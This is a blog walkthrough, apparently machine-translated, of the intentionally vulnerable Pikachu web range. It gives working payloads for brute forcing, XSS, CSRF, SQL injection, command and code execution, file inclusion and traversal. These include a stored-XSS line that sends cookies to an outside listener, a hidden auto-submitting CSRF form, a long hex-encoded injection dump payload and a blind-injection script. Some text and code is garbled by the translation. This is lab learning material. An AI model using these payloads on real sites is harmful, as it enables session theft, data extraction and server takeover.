pikachu range clearance WP

Posted by Delaran on Thu, 11 Jun 2020 09:42:01 +0200

pikachu range clearance WP

Pikachu is a web application system with vulnerabilities, which contains common web security vulnerabilities. If you are a web penetration test learner and are worried about not having the right range to practice, then Pikachu may be right for you.

This is a note taken by Mr. Han Lu after learning the course "Web security from entry to give up" in i-chunqiu. The video course is long and lasts for 458 minutes. This is to record the whole process of learning experience in written version and clearance of shooting range for future reference.
This article will not elaborate on the setting up of the range environment. You can directly use the existing docker image. However, some functions are not normal due to environmental problems. You can change the configuration file by entering the shell of the docker image.

brute force

burp blasting reference link: https://t0data.gitbooks.io/burpsuite/content/chapter8.html

Brute force solution based on form

Open the Burp to grab the packets, and Cluster bumb will explode the dictionaries in the username and password fields to get admin/123456. There is nothing to say.

Verification code bypass (on server)

If the verification code does not expire, the repeater module is used to test whether the verification code expires. If the verification code does not expire, the username and password can be submitted repeatedly, as above
Think about how burp can retrieve the verification code from the server and fill it in the payload

Verification code bypass (on client)

The client himself is to prove himself, that is, all users has the final say. f12 developer mode to view the source code of the web page and find that the generation of the verification code and the verification of the verification code are realized through the previous paragraph

<script language="javascript" type="text/javascript">
    var code; //Define verification code globally
    function createCode() {
        code = "";
        var codeLength = 5;//Length of verification code
        var checkCode = document.getElementById("checkCode");
        var selectChar = new Array(0, 1, 2, 3, 4, 5, 6, 7, 8, 9,'A','B','C','D','E','F','G','H','I','J','K','L','M','N','O','P','Q','R','S','T','U','V','W','X','Y','Z');//All the candidate characters that make up the verification code can also be in Chinese

        for (var i = 0; i < codeLength; i++) {
            var charIndex = Math.floor(Math.random() * 36);
            code += selectChar[charIndex];
        if (checkCode) {
            checkCode.className = "code";
            checkCode.value = code;

    function validate() {
        var inputCode = document.querySelector('#bf_client .vcode').value;
        if (inputCode.length <= 0) {
            alert("Please enter the verification code!");
            return false;
        } else if (inputCode != code) {
            alert("Verification code input error!");
            createCode();//Refresh verification code
            return false;
        else {
            return true;


As long as you have filled in the verification code correctly (note that the verification code here is case sensitive), let burp catch the packet and it will burst

token anti explosion?

Check the source code and find that there is a token value of hidden attribute in the submitted form. The generated token value will be different each time the form is pulled. The submitted form must contain the token value to be valid. Recursive grep (recursive grep) in the intruder module of burp is just the right mode. This type of Payload is mainly used in scenarios where valid data is extracted from the server. It needs to extract data from the response of the server as the Payload, and then replace the location of the Payload to attack. Its data comes from the original response message. Based on the original response, configure grep rules in Options of Payload, and then extract data according to grep to attack.
The steps of extracting token value for blasting are as follows:
Submit a form on the token explosion-proof page ----- > burp grabs the package ----- > Ctrl + I sends the message to the intrude module ----- > position, set username, password, The value of token is payload ------ > the payload set in the payload sub option is set to 1 as the user name dictionary, 2 as the password dictionary, and 3 as the payload type, select recursive grep ------ > the initial payload for first payload of the payload option of payload3, fill in the token value of the first burst ------ > Locate the value of the token in the form form form returned by the first request in the grep extract sub option of the option module -------- recursive grep is not supported for multithreading, so it is also necessary to set the number of threads in the request engine to 1 ------ > click the start attack button to start the attack
The simplest algorithm here is to let payload1 and payload 2 do full array blasting, but payload3 is used once, I can't find the button to set payload3 to use once, so I directly use cluster bomb mode to blast, so the blasting is actually three full array of payloads, with low efficiency, but in fact, the final result can also be blasted.

Cross-Stie Scripting

Reflective xss(get)

The input box prompts you to input your favorite basketball star. Click submit to directly output your input to the Web front end. During the test, we found that the input box actually has a limit on our input length, which limits the maximum length to 20.

<input class="xssr_in" maxlength="20" name="message" type="text">

For example, if our payload is < script > alert (1) < script >, the length exceeds the limit. The bypass method is to directly type payload in the get request, such as: http://xxx/vul/xss/xss_ reflected_ get.php?message=%3Cscript%3Ealert (1)%3C%2Fscript%3E&submit=submit. Or modify the maxlength field of the front-end input to write payload submission directly in the input box.
Considering the actual attack scenario of XSS, we should construct a web link with payload to lure users to click. The attack verification link is as follows: http://xxx/vul/xss/xss_ reflected_ get.php?message=%3Cscript%3Ealert (1)%3C%2Fscript%3E&submit=submit

Reflective xss(post)

You need to log in here. The account password admin/123456 blasted in the front is enough to log in, and then you need to enter the input box of your favorite basketball star. The difference is the post submission parameter. We need to construct an attack scenario.
Suppose that the server that normally provides Web services is NS(normal server), and the malicious server built by the attacker contains malicious form pages is AS(attack server). If A wants B to trigger the post xss on NS, then A needs to let B submit the payload to NS without knowing it. Taking the cookie after B logs in NS AS an example, the attack steps are AS follows: A constructs A form page that automatically submits payload to NS, and places it on AS to wait for B to visit; B browser logs in NS, and just visits the page of the maliciously submitted form on AS, then B triggers xss without knowledge, and the cookie is stolen.

AASNSB constructs the form page B of malicious post to NS, logs in to NSB, unintentionally visits the malicious page on AS, AS returns the browser containing JS code B of automatic post data to NS, posts the data without the user's knowledge, triggers xssAASNSBpost reflective xss vulnerability exploitation scenario diagram

Storage xss

Storage type XSS usually appears in messages, blog logs, comments and other places, and the harm is greater than reflection type XSS. Malicious JS code is saved on the server side. As long as users visit the page, malicious code will be triggered. The more famous SamyWorm is storage type XSS. Using the scenario, let's simulate cookie stealing:

We use nclisten to simulate the attack server http://www.nclisten.cn/ Get a listening port to simulate the malicious server of the attacker. Here I get a port of 52119. Means submit to http://www.nclisten.cn:52119 traffic is controlled by the attacker.

This question is a message board without filtering. You can trigger malicious JS to steal cookie s and send them to malicious server by submitting a < script > tag, such as:

document.write("<img src=http://www.nclisten.cn:52119/"+document.cookie+">");

This malicious code means to send the cookie of this page as a url to our nc listening port. The attacker can see the complete message on the monitored port and steal the user cookie indirectly through the url parameter. If we refresh the page, we will receive:

GET /PHPSESSID=t30hinto5jli4asdjdi59n6k0a HTTP/1.1
Host: www.nclisten.cn:52119
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://www.xxx.com/vul/xss/xss_stored.php
Connection: close
content:('x.x.x.x', 4892)

The case of cookie stealing is roughly the same. We will not make xss use of records later, only record triggering and bypassing.

Dom xss

Generally, Dom xss is caused by the front-end JS's improper handling of controllable parameters. For example, the click me! Button of this topic corresponds to an event event, which triggers the JS script domxss(). Continue to trace and analyze and find the domxss() code as follows:

	function domxss(){
    var str = document.getElementById("text").value;
    document.getElementById("dom").innerHTML = "<a href='"+str+"'>what do you see?</a>";
    //Try: '> img SRC = "ο" ο nm ο use ο ver = "alert ('xss')" >
    //Try: 'ο nclick = "alert ('xss')" > Just close it

The code implements taking values from the text box and inserting them into the tag < a href... > we can first close the a tag and reconstruct a new malicious tag to insert into the code (the code also gives a hint). You can build a payload as follows:

'><img src=x onerror=alert(1)><a href='#

After the payload is processed, document.getElementById("dom").innerHTML writes

<a href=''><img src=x onerror=alert(1)><a href='#'>what do you see?</a>

It closes the front tag and the back tag, so it is not easy to find that malicious code has been inserted. Of course, it can only close the front tag, and the subsequent tag can be executed because of the html fault tolerance.

Is dom xss harmful? I think it is. First of all, such attacks will not be blocked by waf, and the payload length will not be limited. For example, the controllable parameter is passed in the url, which is much more harmful than the reflective xss. There's a prophet On Dom_xss Several ways of utilization are introduced.

Dom xss-x

Just like the topic, let's first look at the code logic, which takes the value of the parameter text from the url and then combines a new link back to the front end.

function domxss(){
    var str = window.location.search; //Take the parameters after the url
    var txss = decodeURIComponent(str.split("text=")[1]); //url decoding
    var xss = txss.replace(/\+/g,' ');
//  alert(xss);
    document.getElementById("dom").innerHTML = "<a href='"+xss+"'>Let the past go with the wind,Go with the wind</a>";
   //Try: '> img SRC = "ο" ο nm ο use ο ver = "alert ('xss')" >
   //Try: 'ο nclick = "alert ('xss')" > Just close it

Please say your sad past button takes text to form a new link. The parameters of the new link can be controlled to create xss when the value is taken. payload is the same as the previous question, but the process of parameter transfer is different.

XSS blind play

It means that the attacker hits xss payload without echo. The possible use scenario is the message office. The message maker can't see the content written. The administrator can see and trigger the malicious script from the background, which is often used to steal cookie s.

XSS filtering

Filtered script throughOr wait for the tag to trigger.

<img src=x onerror=alert(1)>

Common bypass methods:

  1. Case

htmlspecialchars of XSS

php's htmlspecialchars() function is to convert predefined characters into HTML entities.

Predefined characters are:

  • &(and) become&
  • (double quotes) become
  • ’(single quotation mark) becomes "
  • < become<&“
  • >(greater than) become >

The default htmlspecialchars will not be escaped ". The test idea is to input these symbols once to see which symbols will be escaped. For example, if we input 111 < > '", we can see that the source code characters in the returned results have been converted into predefined entity codes, except for single quotation marks.

<a href='111&lt;&gt;&quot;'&amp;'>

Construct closure for single quotes add new attribute bypass for a tags, such as construct payload

#' οnclick='alert(1)'

After filling in the original page, the complete code is as follows. Click this tab to trigger xss

<a href='#' οnclick='alert(1)''>#' οnclick='alert(1)'</a>

XSS's href

Directly trigger the href through the pseudo protocol, and click the hyperlink of the pseudo protocol to trigger xss. For example:


To prevent xss caused by pseudo protocol in the href, you can use http or https at the beginning of restriction

JS output of XSS

This is applicable to the situation that the controllable variable output is in the front end < script >. The test idea is to input a random character first and submit it, then check the source code Ctrl + F to find the random string just entered and locate it in the code. For example, I input asdf and find the corresponding output location of asdf.

    if($ms.length != 0){
        if($ms == 'tmac'){
            $('#fromjs').text('tmac It's really powerful,Look at that little look..')
        }else {
        // alert($ms);
            $('#fromjs').text('Never give up what you love..')


Construct a payload, such as:


If you fill in the original output position of payload, it will become


It is equivalent to inserting a fragment of pop-up code on the original basis, and xss is successfully utilized.
XSS is generally of the same type. The defense can be summed up as: input filtering, output escaping, and more learning in real combat.


The explanation of CSRF in Pikachu range is as follows:

Cross Site Request Forgery is referred to as "CSRF". In the attack scenario of CSRF, the attacker will forge a request (usually a link), and then cheat the target user to click on it. Once the user clicks on the request, the whole attack is completed. So the CSRF attack is also called "one click" attack. Many people don't understand the concept of CSRF, or even sometimes confuse it with XSS, or even confuse it with the problem of ultra vires, which is caused by the unclear principle.


According to the prompt in the upper right corner, you can log in to vince/allen/kobe/grady/kevin/lucy/lili and other users. After logging in, there is a personal information modification page with a link to modify personal information. submit sends and grabs the package.

GET http://www.xxx.com/vul/csrf/csrfget/csrf_get_edit.php?sex=gir&phonenum=233&add=canada&email=lili%40picachu.com&submit=submit HTTP/1.1
Host: www.fxx.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://www.fxxx.com/vul/csrf/csrfget/csrf_get_edit.php
Connection: close
Cookie: PHPSESSID=38jfkmc1o29dm6gkkt8g33sim2
Upgrade-Insecure-Requests: 1

Parameter is A get parameter, and there is no csrf_token. Attacker A wants to modify the relevant information of attacker B, just build such A link for B to send. It is equivalent to that A borrows B's permission to modify B's personal information.

For example, A wants to set the email address of lili's personal information as his own attacker@attacker.com , you can construct links:


A can send this link to lili via email or other ways to induce lili to click. You can also combine the xss combo to let lili's client automatically send the request. For example, leave a message in the storage xss area as follows, and wait for lili to view the page in the message area.

'><img src='http://www.xxx.com/vul/csrf/csrfget/csrf_get_edit.php?sex=gir&phonenum=233&add=canada&email=attacker%40attacker.com&submit=submit'>

Log in to the lili account, check the xss message area, and then return to check the personal information. You can find that the personal email has been modified


The utilization method is the * * reflective XSS (post * *) utilization scenario written earlier, which requires an attacker to make a malicious page that automatically submits the form form to hang on the server and let the victim trigger it. Unlike get type csrf, attackers need to construct malicious forms against forms with csrf pages and submit them automatically. If the attacker constructs the following page for this problem:

<title>Form Form auto submit</title>
<!-- Auto click after loading the page submit Submit -->
<script type="text/javascript">
	window.onload = function(){
		window.location.href="http://www.fucguigui.com"; //Submit the page to which you have completed the jump, in order to disguise
<script type="text/javascript">
	function autoSubmit(){
<body >
<!-- Hidden forms -->
<form id='myForm' action="http://www.xxx.com/vul/csrf/csrfpost/csrf_post_edit.php" method="post">
	<input type='hidden' name='sex' value='boy'>
	<input type='hidden' name='phonenum' value='evil'>
	<input type='hidden' name='add' value='fake_addr'>
	<input type='hidden' name='email' value='evil_form@admin.com'>
	<input id='submit' type="submit" name='submit' value="submit" style="display:none;"></input>

lili, the victim, logs in the original vulnerability page and visits the page constructed by the attacker, and the attacker will use his identity to submit the form of modification information without knowing it.

CSRF prevention

Add token verification

  1. Add token for key operation. The token must be random and different every time

    About CSRF_ For the operation of token attack, please refer to: Magic can defeat Magic: thinking about the front-end skills of obtaining CSRF token

About secure session management (to avoid session exploitation)

  1. Client does not save sensitive information (such as identity authentication information)
  2. Test the session expiration mechanism for closing and exiting
  3. Set session expiration mechanism, such as 15 minutes without operation, automatic login timeout

Access control security management

  1. The modification of sensitive information requires secondary authentication (such as verifying the old password when modifying the account number)
  2. post instead of get is used for information modification.
  3. Restrict the original page through the referer in the http header

Add verification code

  1. Verification code is mainly used to prevent blasting, but some key operations are better to add verification code without affecting availability.

SQL injection

It doesn't need to mention that SQL map or scanner scans for injection vulnerabilities. It only records the ideas and simple methods of manual testing. Manual injection is more important to understand the characteristics and statements of various databases, and it requires a lot of effort to learn.

By the way, mysql with union echo can be injected into sqligod to facilitate graphical injection. The payload is as follows:

concat(0x3c7363726970743e6e616d653d70726f6d70742822506c6561736520456e74657220596f7572204e616d65203a2022293b2075726c3d70726f6d70742822506c6561736520456e746572205468652055726c20796f7527726520747279696e6720746f20496e6a65637420616e6420777269746520276d616b6d616e2720617420796f757220496e6a656374696f6e20506f696e742c204578616d706c65203a20687474703a2f2f736974652e636f6d2f66696c652e7068703f69643d2d3420554e494f4e2053454c45435420312c322c332c636f6e6361742830783664363136622c6d616b6d616e292c352d2d2b2d204e4f5445203a204a757374207265706c61636520796f757220496e6a656374696f6e20706f696e742077697468206b6579776f726420276d616b6d616e2722293b3c2f7363726970743e,0x3c623e3c666f6e7420636f6c6f723d7265643e53514c69474f44732053796e746178205620312e30204279204d616b4d616e3c2f666f6e743e3c62723e3c62723e3c666f6e7420636f6c6f723d677265656e2073697a653d343e496e6a6563746564206279203c7363726970743e646f63756d656e742e7772697465286e616d65293b3c2f7363726970743e3c2f666f6e743e3c62723e3c7461626c6520626f726465723d2231223e3c74723e3c74643e44422056657273696f6e203a203c2f74643e3c74643e3c666f6e7420636f6c6f723d626c75653e20,version(),0x203c2f666f6e743e3c2f74643e3c2f74723e3c74723e3c74643e2044422055736572203a203c2f74643e3c74643e3c666f6e7420636f6c6f723d626c75653e20,user(),0x203c2f666f6e743e3c2f74643e3c2f74723e3c74723e3c74643e5072696d617279204442203a203c2f74643e3c74643e3c666f6e7420636f6c6f723d626c75653e20,database(),0x203c2f74643e3c2f74723e3c2f7461626c653e3c62723e,0x3c666f6e7420636f6c6f723d626c75653e43686f6f73652061207461626c652066726f6d207468652064726f70646f776e206d656e75203a203c2f666f6e743e3c62723e,concat(0x3c7363726970743e66756e6374696f6e20746f48657828737472297b76617220686578203d27273b666f722876617220693d303b693c7374722e6c656e6774683b692b2b297b686578202b3d2027272b7374722e63686172436f646541742869292e746f537472696e67283136293b7d72657475726e206865783b7d66756e6374696f6e2072656469726563742873697465297b6d616b73706c69743d736974652e73706c697428222e22293b64626e616d653d6d616b73706c69745b305d3b74626c6e616d653d6d616b73706c69745b315d3b6d616b7265703d22636f6e636174284946284074626c3a3d3078222b746f4865782874626c6e616d65292b222c3078302c307830292c4946284064623a3d3078222b746f4865782864626e616d65292b222c3078302c307830292c636f6e6361742830783363373336333732363937303734336537353732366333643232222b746f4865782875726c292b2232323362336332663733363337323639373037343365292c636f6e63617428636f6e6361742830783363373336333732363937303734336536343632336432322c4064622c307832323362373436323663336432322c4074626c2c3078323233623363326637333633373236393730373433652c30783363363233653363363636663665373432303633366636633666373233643732363536343365323035333531346336393437346634343733323035333739366537343631373832303536323033313265333032303432373932303464363136623464363136653363326636363666366537343365336336323732336533633632373233653534363136323663363532303465363136643635323033613230336336363666366537343230363336663663366637323364363236633735363533652c4074626c2c3078336332663636366636653734336532303636373236663664323036343631373436313632363137333635323033613230336336363666366537343230363336663663366637323364363236633735363533652c4064622c307833633266363636663665373433653363363237323365346537353664363236353732323034663636323034333666366337353664366537333230336132303363363636663665373432303633366636633666373233643632366337353635336533633733363337323639373037343365363336663663363336653734336432322c2853454c45435420636f756e7428636f6c756d6e5f6e616d65292066726f6d20696e666f726d6174696f6e5f736368656d612e636f6c756d6e73207768657265207461626c655f736368656d613d40646220616e64207461626c655f6e616d653d4074626c292c3078323233623634366636333735366436353665373432653737373236393734363532383633366636633633366537343239336233633266373336333732363937303734336533633266363636663665373433652c307833633632373233652c2873656c65637420284078292066726f6d202873656c656374202840783a3d30783030292c284063686b3a3d31292c202873656c656374202830292066726f6d2028696e666f726d6174696f6e5f736368656d612e636f6c756d6e732920776865726520287461626c655f736368656d613d3078222b746f4865782864626e616d65292b222920616e6420287461626c655f6e616d653d3078222b746f4865782874626c6e616d65292b222920616e642028307830302920696e202840783a3d636f6e6361745f777328307832302c40782c4946284063686b3d312c30783363373336333732363937303734336532303633366636633665363136643635323033643230366536353737323034313732373236313739323832393362323037363631373232303639323033643230333133622c30783230292c30783230363336663663366536313664363535623639356432303364323032322c636f6c756d6e5f6e616d652c307832323362323036393262326233622c4946284063686b3a3d322c307832302c30783230292929292978292c30783636366637323238363933643331336236393363336436333666366336333665373433623639326232623239376236343666363337353664363536653734326537373732363937343635323832323363363636663665373432303633366636633666373233643637373236353635366533653232326236393262323232653230336332663636366636653734336532323262363336663663366536313664363535623639356432623232336336323732336532323239336237643363326637333633373236393730373433652c636f6e6361742830783363363233652c307833633733363337323639373037343365373137353635373237393364323232323362363636663732323836393364333133623639336336333666366336333665373433623639326232623239376237313735363537323739336437313735363537323739326236333666366336653631366436353562363935643262323232633330373833323330333336313333363133323330326332323362376437353732366333643735373236633265373236353730366336313633363532383232323732323263323232353332333732323239336236343664373037313735363537323739336437353732366332653732363537303663363136333635323832323664363136623664363136653232326332323238373336353663363536333734323834303239323036363732366636643238373336353663363536333734323834303361336433303738333033303239323032633238373336353663363536333734323032383430323932303636373236663664323832323262363436323262323232653232326237343632366332623232323937373638363537323635323834303239323036393665323032383430336133643633366636653633363137343566373737333238333037383332333032633430326332323262373137353635373237393262323233303738333336333336333233373332333336353239323932393239363132393232323933623634366636333735366436353665373432653737373236393734363532383232336336313230363837323635363633643237323232623634366437303731373536353732373932623232323733653433366336393633366232303438363537323635323037343666323034343735366437303230373436383639373332303737363836663663363532303534363136323663363533633631336532323239336233633266373336333732363937303734336529292929223b75726c3d75726c2e7265706c616365282227222c2225323722293b75726c706173313d75726c2e7265706c61636528226d616b6d616e222c6d616b726570293b77696e646f772e6f70656e2875726c70617331293b7d3c2f7363726970743e3c73656c656374206f6e6368616e67653d22726564697265637428746869732e76616c756529223e3c6f7074696f6e2076616c75653d226d6b6e6f6e65222073656c65637465643e43686f6f73652061205461626c653c2f6f7074696f6e3e,(select (@x) from (select (@x:=0x00), (select (0) from (information_schema.tables) where (table_schema!=0x696e666f726d6174696f6e5f736368656d61) and (0x00) in (@x:=concat(@x,0x3c6f7074696f6e2076616c75653d22,UNHEX(HEX(table_schema)),0x2e,UNHEX(HEX(table_name)),0x223e,UNHEX(HEX(concat(0x4461746162617365203a3a20,table_schema,0x203a3a205461626c65203a3a20,table_name))),0x3c2f6f7074696f6e3e))))x),0x3c2f73656c6563743e),0x3c62723e3c62723e3c62723e3c62723e3c62723e)

Digital input

The input of this question is to select a number from a select box, post to submit the back-end database query, and the output is user name and email. It is assumed that the backend executes such a sentence of SQL:

select username field, email field from user table where userid=$_POST(userid);

The most common and simplest construction injection is to close the last field of the sql statement and insert new characters. Randomly submit a number such as 1. burp grabs the packet and puts it into the repeater template. The parameter of post is changed to id = 1 '& submit =% E6% 9F% a5% E8% AF% A2. Try to use the' close 'statement. As expected, an error is returned.

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 

From the error reporting information, it can be confirmed that the injection vulnerability exists and the back-end database is mysql. If you know more about MySQL statements, you can build your own payload. If you have echo error reporting, you can adjust the statements gradually according to the error reporting. If we want to confirm the database version and inject manually, we can determine the number of columns first. Try to report an error in order by 3 first, indicating that the number of columns queried is less than 3

id=1 order by 3&submit=%E6%9F%A5%E8%AF%A2

order by 2 can be executed normally, indicating that the number of columns returned from the query result is 2. Knowing the number of columns is a key step for us to manually construct the injection statement later. Construct payload to determine the output echo position.

id=1 union select 1,2&submit=%E6%9F%A5%E8%AF%A2

Through this step of echo hello 1, your email is:2 we know the echo location of the query, and we can roughly judge that the data types of these two query results should be characters. If we want to continue manual injection, for example, through the previous error echo, we have determined that the backend data is mysql, what is its version? Payloads can be constructed as follows:

id=1 union select @@version,2&submit=%E6%9F%A5%E8%AF%A2

The result is

hello,5.7.27 your email is: 2

In this way, the database version is mysql 5.7.27. The principle of SQLI is basically the same.

Character injection (GET)

Here, there is an input box for character type input, and the GET method passes the parameter name. Try typing Kobe first. The query result is your uid:3 your email is: kobe@pikachu.com The same idea is to add "sql error reporting" at the end. In fact, error echo is the simplest case of sql injection. It can't be used by payload s with the same number type as above. Considering from the original sql statement, the general character type insert statement may be:

select uid field, email field from user table where username =$_ GET(username);'

Because when writing sql, character types may be enclosed in single quotation marks or double quotation marks. If you want to insert a statement that can be closed and executed normally, you need to consider closing the quotation marks of the preceding string. At the same time, we know that the database is mysql through the preceding injection. If you want to invalidate the quotation marks at the end of the statement, you can use a single line comment.

For example, if you want to execute

select 1,'Inject by C'

Payloads are going to be written

' union select 1,'Inject by C'#

Splicing into the original statement is a complete injection statement.

select uid field, email field from user table where username = '' union select 1, 'object by C'? '

The GET parameter should be url encoded, so the full payload is

?name='%20union%20select%201%2c'Inject by C'%23

Search injection

The general search function will use the SQL fuzzy matching function, such as: search all users whose user names contain k

select * from USER where usename='%k%'

The idea of constructing a payload is the same as that of character type. It's better to construct a closed payload. You can construct a payload

k%' union select 1,2,'sqlitest'#

url coding and integration to get and transfer to the server for execution


XX injection

In fact, it can be seen from the above three situations that SQL injection is to guess what statement splicing should be and confirm whether the constructed payload is executed. Error echo by adding "at the end of query parameter is a way to confirm SQL injection, and there are other injection without echo.

Generally, it can be judged whether a statement is executed or not by splicing logical expressions such as' and 1=2 ',' or 1=1 '; the results are different after the statement. Test closure in the same way as before, test to


It is found that the statement can be executed normally, indicating that the statement spliced here should be closed with parentheses. Try adding the statement you want to execute before the comment, and inject successfully



All the previous injections are based on union or select queries, but in fact, the inserts and updates can also be injected, not only sql injection, but also storage xss (for example, users write when registering hereYou can find the pop-up window when you log in. During insert injection, if you use subquery statements to splice and log in to find the location you just inserted, you need to register an account for each test, which is quite troublesome. It is more convenient to output the data we want based on the structure of error reporting points such as updatexml(), extractvalue(), floor(). It is common for insert statements, such as

insert into USERS(username, passwd,email) values('','','')

When you want to insert a statement, you can use or to construct a closure, such as user name filling in the field

' or evil_sql or ', which can be inserted into the original sentence to achieve the effect of executing malicious statements

insert into USERS(username, passwd,email) values('' or evil_sql or','','')

Based on the error message, the user name is payload

kobe2' or updatexml(1,concat(0x7e,version()),0) or '

Then enter any password field and submit it to find the error echo of our query version:

XPATH syntax error: '~5.7.27'

In the same way, the same payload can be used for the injection of update. It should be noted that when filling in the update form, remember to fill in each column and click submit. Otherwise, it will not be executed. This is the problem of the back-end code of the shooting range.

Delete injection

It's not hard to find that clicking delete here will send the id parameter in get mode. At the same time, the id parameter is a number type, so the error function can also be used to trigger echo. Construct payload

 or extractvalue(1,concat(0x7e,database()))#

url encoded and spliced after url parameter


After access, the database() function successfully executes and echoes in the error report, and the injection is successful.

XPATH syntax error: '~pikachu'

Error reporting injection floor injection (refer to https://www.cnblogs.com/sfriend/p/11365999.html )

floor() error reporting injection uses floor,count,group by conflict to report an error. It is an error generated when these three functions are used together in a specific situation. You will find this is a very clever way after you understand the principle.

"http header" injection

After admin/123456 logs in, the page displays the user agent, http accept and port number information, and prompts that this information has been recorded in the database. It is not difficult to guess that the database insert statement is used here. The content of the insert is the value taken from the http header. burp grabs the package and changes the user agent. It is indeed the field of the http header. Using the same theory of payload, we can use error based injection. Send a page request to grab a packet and modify the UA part of the http header to

User-Agent: evil' or updatexml(1,concat(0x7e,version()),0) or '

Echo based on error injection

XPATH syntax error: '~5.7.27'

Similarly, http_accept and so on can also be injected using the same method. Besides, there are username and passwd fields in the cookie. It's not hard to find that they exist here

base on boolean

Blind injection is that in some cases, the error echo of the database is blocked by the developers. We can not determine the injection point and the injection result through the echo.

The injection point can be determined by the logical operation of and 1=1 × and order by 1 × to observe whether the page is normal. The utilization of blind injection can be based on the judgment of bool, time injection or dnslog.

Let's first look at bool injection. Enter Kobe 'and 1 = 1 × to execute, kobe' and 1=2 × not to execute, all our content must have been injected successfully. How to use it?

bool injection is more important for value taking and operation functions such as lenth(), substr(), and ascii(). Substr() intercepts the letters of strings and transcodes them into numbers through ascii() function to participate in mathematical operation. For example:

select ascii(substr('string',1,1))>114;

This statement will return 1. The ascii code of the calculated character s after string truncation is 115, and 115 is obviously greater than 114. Of course, such a judgment is very slow. For example, we don't know how long the character is when we inject the database name. At this time, we can judge the length based on the length function. as

kobe' and length(database())>7#

Display username does not exist, but

kobe' and length(database())>6#

What is displayed is the information of the query result. So we determined that the database name has seven characters.

Then what is the first character of the database? Similar

kobe' and ascii(substr(database(),1,1))=112# #The database name is pikachu, the ascii value of p is 112, the expression is true, and the other values of 112 are false

With this logic judgment, we can determine the ascii code value of each character. The principle of bool blind injection is roughly the same. Manual testing is hard to avoid too much work, so bool type blind injection is best completed by automatic script.

For the database name explosion here, write a simple explosion script as follows

# If only the blasting script is used, the blasting efficiency of dichotomy will be higher

import requests
import string


# data = {"name": "kobe' and ascii(substr(database(),1,1))=112#Submit: submit}
headers = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko)"
                         " Chrome/54.0.2840.99 Safari/537.36"}
cookies = {"PHPSESSID": "iiuifpfpk5b4u462apjm5nqb87"}

# r = requests.get(base_url,  params=data, headers=headers, cookies=cookies)

for length in range(1, 8):
    for i in range(0, 128):
        data = {"name": "kobe' and ascii(substr(database()," + str(length)+ ",1))="+str(i)+"#", "submit": "Submit"}
        r = requests.get(base_url, params=data, headers=headers, cookies=cookies)
        if r.text.find('your uid') != -1:

Of course, the substr() function above can also replace the left(), right() and other functions that take characters.

Common table names can be accessed through information_schema, but sometimes the table is unreadable. Based on the truth, you can also use the exists function to explode the table name

Kobe 'and exists (select * from)#

Combined with the burp grep rule to guess the table name.

base on time

If the injection based on bool can be judged based on 0 or 1, the blind injection based on time will not see anything, and you cannot judge whether your statement is executed from the different display. In this case, time-based blind injection can be introduced. The delay function of mysql is sleep. For example, the input box here is faster when I type kobe echo, but if I type here

kobe' and sleep(5)#

It's found that the server side took a long time to process the request, that is, there is sql injection. If payload is used, it can be combined with if judgment statements, such as: judge whether the first bit returned by database() is p, and construct payload

kobe' and if((substr(database(),1,1))='p', sleep(5),null)#


kobe' and if((substr(database(),1,1)='a', sleep(5),null))#

It is not difficult to find that the first payload must have executed the sleep function, so the first letter of the database name is p, and the following utilization methods will be used in turn. In addition, the benchmark (count, expr) function can also achieve the effect of blind injection based on time. Count is the number of times to calculate expr expression. The larger the value, the longer the time.

Wide byte injection

Wide byte injection is a feature of mysql. When mysql uses GBK encoding, it will think that two characters are a Chinese character (the former ASCII code should be greater than 128 before reaching the range of Chinese characters), but now it is widely used in unicode or ut8. phithon talks about the details of wide byte injection writing: https://www.leavesongs.com/PENETRATION/mutibyte-sql-inject.html

Understand the principle, construct the injection of post data package

name=kobe%df' or 1=1#&submit=%E6%9F%A5%E8%AF%A2


In general, remote command execution is that the attacker directly sends instructions or code to the background server to inject the system remotely, so as to control the background system.


This is a function interface of ping. Enter to return the result of ping. However, since the backend is directly spliced, the pseudo code is

ping $_POST[ip]

If the post parameter is;ls

The complete command after splicing is


This implements the injection command effect.


In the same way, because of the requirement design, sometimes the background will execute the user's input as a part of the code, which also creates a remote code execution vulnerability. Whether it's a function executed by code or an unsafe deserialization, etc.

Therefore, if it is necessary to provide the front-end users with the API interface of operation class, it is necessary to make strict judgment on the input content of the interface. For example, it is a better method to implement the strict white list strategy.

Here, the main thing is that the back-end eval() calls unfiltered user input data to execute php code.

Enter POC here


The system executes the php code and returns the execution result

File Inclusion

File Inclusion Vulnerability is that the code calls any file under the control of the user, which may cause command execution or arbitrary file reading. include(),require(), etc. are common php include functions.

Local file contains

Here is a selection box. Selecting the corresponding person name will display the corresponding person information, but pay attention to the url


The filename parameter contains a contained file. If you change the filename field to another known system path, such as / etc/passwd of linux, you can use.. / to indicate the upper directory and write more to get the root directory location


Accessing the linked system reads the passwd file and echoes

Remote file contains

The principle of remote file inclusion is the same as above, but the difference is that the included file is the external address code, and the utilization condition of PHP environment is php.ini Set allow in_ url_ Open (default open), allow_ url_ Include is on by default.

The normal request is


If the filename parameter is changed to the malicious file contained remotely, the system may execute the malicious script loaded remotely.

For example, if you want to write a phpinfo page at the target site, you can first construct a piece of code to write to the file


 system("echo '<?php phpinfo();?>'>>phpinfo.php");

Place this file on an accessible address, such as: http;//a.com/phpinfo.txt . The poc contained in the remote file is then constructed and accessed.


The background will execute and remotely load the content to create a phpinfo.php , visit the phpinfo.php You can see that our file was successfully written and executed by the vulnerable site. Exploit successful.

Unsafe Filedownload

Any file download is caused by that the downloaded file name can bypass the expected download file name limit, and the backend directly splices the file name parameter request submitted by the user into the path for download without judgment. Vulnerability may cause source code download, sensitive information disclosure and so on.

The normal request is, which will be downloaded after sending the request kb.png


Try to modify the filename parameter to download the / etc/passwd document through directory traversal, and access the


Any file download succeeded.

Unsafe Fileupload

Here, pikachu's shooting range only illustrates the principle of vulnerability. If you want to learn this part in detail, you can play upload labs shooting range.

